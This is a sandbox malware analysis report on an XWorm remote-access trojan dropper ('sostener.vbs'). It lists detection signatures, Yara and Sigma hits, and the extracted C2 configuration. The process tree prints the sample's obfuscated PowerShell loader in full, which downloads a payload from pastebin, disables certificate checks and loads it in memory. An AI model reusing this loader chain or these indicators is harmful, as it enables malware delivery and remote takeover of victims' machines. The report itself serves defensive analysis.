Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name:sostener.vbs
Analysis ID:1524706
MD5:b18fcb9a2af66c700b70cd9f9a58a563
SHA1:dae167b9d105e0a29dfb43d83540634819c41f0f
SHA256:06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d
Tags:asyncratvbsuser-lontze7
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5604 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 1088 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 3652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • powershell.exe (PID: 2316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 6592 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 5368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7208 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegAsm.exe (PID: 7308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["toskaadmx.duckdns.org"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x19b33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x2ceeb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x19bd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x2cf88:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x19ce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x2d09d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x18c1b:$cnc4: POST / HTTP/1.1
    • 0x2bfd3:$cnc4: POST / HTTP/1.1
    00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xf3e3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf480:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf595:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xe4cb:$cnc4: POST / HTTP/1.1
      0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.powershell.exe.2877ca20000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          4.2.powershell.exe.2877ca20000.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URLDetects executables (downloaders) containing reversed URLs to raw contents of a pasteditekSHen
          • 0x1a4b:$u1: /moc.nibetsap//:sptth
          4.2.powershell.exe.2877ca20000.4.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
          • 0x1a65:$h2: //:sptth
          • 0x119c:$s1: DownloadString
          • 0xfe4:$s2: StrReverse
          • 0x118b:$s3: FromBase64String
          • 0x1457:$s4: WebClient
          16.2.RegAsm.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            16.2.RegAsm.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xf5e3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xf680:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xf795:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xe6cb:$cnc4: POST / HTTP/1.1
            Click to see the 24 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6400.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7096.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??Tg
                Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?L